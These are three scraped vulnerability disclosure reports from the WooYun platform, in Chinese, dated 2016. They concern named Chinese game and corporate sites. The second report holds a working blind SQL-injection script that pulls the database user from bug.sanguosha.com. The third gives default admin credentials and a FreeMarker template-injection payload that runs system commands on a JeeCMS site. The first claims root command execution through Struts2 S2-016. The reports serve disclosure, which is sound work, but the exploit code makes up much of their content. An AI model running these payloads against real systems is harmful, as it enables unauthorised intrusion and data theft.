漏洞详情披露状态： 2016-05-20： 细节已通知厂商并且等待厂商处理中2016-05-20： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-25： 厂商已经主动忽略漏洞，细节向公众公开简要描述：@xser 大牛高考加油，记得考完带我飞详细说明： mask 区域*****//tsz.g***** Useage: S2-016 Whoami: rootWebPath: /data/cps/tomcat_7.0.53_gfanplay/webapps/ROOT/====================================================================================================================================漏洞证明：  修复方案：补丁版权声明：转载请注明来源 不能忍@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-25 12:10厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-02： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述： 详细说明： code 区域http://bug.sanguosha.com/ajax.php?a=list&clienttype=0&e=0&g=1 and length(user())=25 AND 000441=000441 -- &page=1&status=100为真时：为假时：user长度为25：  code 区域#encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {'Content-Type': 'application/x-www-form-urlencoded'} payloads = list(string.ascii_lowercase) for i in range(0,10): payloads.append(str(i)) payloads += ['@','_', '.', '-', '\\', ' '] print 'Try to retrive user:' user = '' for i in range(1,26): for payload in payloads: conn = httplib.HTTPConnection('bug.sanguosha.com', timeout=80) s = "/ajax.php?a=list&clienttype=0&e=0&g=1 and ascii(mid(user()from(%s)for(1)))=%s AND 1=1 --&page=1&status=100" % (i, ord(payload)) s=urllib.quote(s,'?,=,&,/') conn.request(method='GET', url= s, headers = headers) html_doc = conn.getresponse().read() conn.close() print '.', #print html_doc if html_doc.find('11090') > 0: # True user += payload print '\n[in progress]', user break print '\n[Done] User is:', user 漏洞证明： 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-03 13:26厂商回复：感谢 路人甲最新状态：暂无

漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-25： 厂商已经确认，细节仅向厂商公开2016-05-05： 细节向核心白帽子及相关领域专家公开2016-05-15： 细节向普通白帽子公开2016-05-25： 细节向实习白帽子公开2016-06-09： 细节向公众公开简要描述：@mayikissyou 大队长说有shell就有机械键盘详细说明：子域名扫描自动化发掘：http://gongyi.wanmei.com/通过指纹识别发现是jeecms。存在默认用户密码:admin,password登录后台之后在乌云找到历史jeecms拿shell漏洞。code 区域<#assign ob="freemarker.template.utility.ObjectConstructor"?new()> <#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.ProcessBuilder","ifconfig").start().getInputStream())) > <#list 1..10000 as t> <#assign line=br.readLine()!"null"> <#if line=="null"> <#break> </#if> ${line} ${"<br>"} </#list>执行系统命令：www权限 漏洞证明：执行系统命令：www权限 修复方案：更改弱口令。版权声明：转载请注明来源 梧桐雨@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-25 17:31厂商回复：感谢洞主对完美世界的关注，我们将尽快修补。最新状态：暂无